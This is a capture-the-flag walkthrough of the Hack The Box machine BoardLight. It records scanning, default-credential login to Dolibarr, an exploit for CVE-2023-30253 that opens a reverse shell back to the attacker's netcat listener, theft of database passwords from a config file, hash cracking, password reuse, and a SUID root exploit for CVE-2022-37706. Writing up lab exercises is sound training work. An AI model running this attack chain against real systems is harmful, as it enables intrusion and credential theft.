Table of contents
Open Table of contents
INFO
CTF URL:https://app.hackthebox.com/machines/BoardLight
IP: 10.10.11.11
Difficulty: Easy
Reconaisance
NMAP
nmap -p- --min-rate 10000 10.10.11.11 -v
# 22, 80
nmap -p22,80 -sS -sC -sV 10.10.11.11 -v
# res
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesnt have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
WEB
Added 10.10.11.11 board.htb to /etc/hosts
Some Enum:
- Wordpress website
[email protected]
Dir
dirsearch -u http://<ip>/
# result
[05:02:55] 301 - 303B - /js -> http://board.htb/js/
[05:03:07] 403 - 274B - /.ht_wsr.txt
[05:03:07] 403 - 274B - /.htaccess.bak1
[05:03:07] 403 - 274B - /.htaccess.orig
[05:03:07] 403 - 274B - /.htaccess.save
[05:03:07] 403 - 274B - /.htaccess_sc
[05:03:07] 403 - 274B - /.htaccess.sample
[05:03:07] 403 - 274B - /.htaccess_extra
[05:03:07] 403 - 274B - /.htaccess_orig
[05:03:07] 403 - 274B - /.htaccessOLD2
[05:03:07] 403 - 274B - /.htpasswd_test
[05:03:07] 403 - 274B - /.htaccessBAK
[05:03:07] 403 - 274B - /.html
[05:03:07] 403 - 274B - /.htpasswds
[05:03:07] 403 - 274B - /.httr-oauth
[05:03:07] 403 - 274B - /.htaccessOLD
[05:03:07] 403 - 274B - /.htm
[05:03:14] 403 - 274B - /.php
[05:03:32] 200 - 2KB - /about.php
[05:04:30] 404 - 16B - /composer.phar
[05:04:35] 200 - 2KB - /contact.php
[05:04:38] 301 - 304B - /css -> http://board.htb/css/
[05:05:03] 403 - 274B - /images/
[05:05:03] 301 - 307B - /images -> http://board.htb/images/
[05:05:10] 403 - 274B - /js/
[05:05:37] 404 - 16B - /php-cs-fixer.phar
[05:05:38] 403 - 274B - /php5.fcgi
[05:05:43] 404 - 16B - /phpunit.phar
[05:05:58] 403 - 274B - /server-status/
[05:05:58] 403 - 274B - /server-status
dirsearch -w /usr/share/wordlists/dirb/big.txt -u http://board.htb
[05:08:35] 301 - 304B - /css -> http://board.htb/css/
[05:08:52] 301 - 307B - /images -> http://board.htb/images/
[05:08:56] 301 - 303B - /js -> http://board.htb/js/
[05:09:23] 403 - 274B - /server-status
with nonexistingpage.php it gives another error
dirsearch -w /usr/share/wordlists/dirb/big.txt -u http://board.htb -t 200 --suffixes '.php'
[05:12:14] 403 - 274B - /.htaccess.php
[05:12:14] 403 - 274B - /.htpasswd.php
[05:12:20] 200 - 2KB - /about.php
[05:12:33] 200 - 2KB - /contact.php
[05:12:36] 200 - 2KB - /do.php
Subdomain fuzzing
gobuster vhost -u board.htb -w /usr/share/wordlists/dirb/common.txt --append-domain -k
...
Found: crm.board.htb Status: 200 [Size: 6360]
...
adding crm.board.htb to /etc/hosts
WEB - CRM
Dolibarr 17.0.0http://crm.board.htb/support/index.php- Login with
admin:adminworked
git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git
cd Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
python3 exploit.py http://crm.board.htb admin admin 10.10.14.43 1234
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.11.11] 52108
bash: cannot set terminal process group (891): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ whoami
whoami
www-data
Shell stabilization
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# ctrl+z
stty raw -echo; fg
PrivEsc to User
Enum
A larissa user
ls -la /home
drwxr-x--- 16 larissa larissa 4096 Jul 24 00:20 larissa
Suid:
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
none is workable, but enlightenment_sys will used later.
Some open ports: (mysql)
ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:58735 0.0.0.0:*
udp UNCONN 0 0 [::]:5353 [::]:*
udp UNCONN 0 0 [::]:56910 [::]:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
Some web files
find ./ -name conf*
# ...
./htdocs/conf/conf.php.old
./htdocs/conf/conf.php.example
./htdocs/conf/conf.php
# ...
Mysql Credentials Found
www-data@boardlight:~/html/crm.board.htb$ cat ./htdocs/conf/conf.php | grep -i user -A 2 -B 2
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
Mysql (not useful)
mysql -h localhost -u dolibarrowner -p
Enter password: # serverfun2$2023!!
# success!
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| dolibarr |
| information_schema |
| performance_schema |
+--------------------+
mysql> use dolibarr;
mysql> show tables;
...
| llx_user |
...
mysql> select pass_crypted,lastname,api_key from llx_user;
+--------------------------------------------------------------+------------+--------------+
| pass_crypted | lastname | api_key |
+--------------------------------------------------------------+------------+--------------+
| $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm | SuperAdmin | NULL |
| $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 | admin | yr6V3pXd9QEI |
+--------------------------------------------------------------+------------+--------------+
lets crack them
hashes.txt
$2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm
$2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Result:
| user | pass |
|---|---|
| admin | admin |
| SuperAdmin | - |
Could not crack for SuperAdmin
Password reuse
su larissa
# serverfun2$2023!!
reuse of db password worked!
user.txt
cat user.txt
24e31e7f12f72093ab439a1e6764e4ef
PrivEsc to root
SUID
find / -perm -4000 2>/dev/null
...
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
...
larissa@boardlight:~$ bash exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
#
#
# whoami
root
root.txt
cat /root/root.txt
062b930711530626c7a1ee00763f50d5
suid exploit will not work for www-data
www-data@boardlight:/tmp$ bash exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
exploit.sh: line 20: /tmp/exploit: Permission denied
chmod: changing permissions of '/tmp/exploit': Operation not permitted
[+] Enjoy the root shell :)
ERROR: ACTION NOT ALLOWED: /bin/mount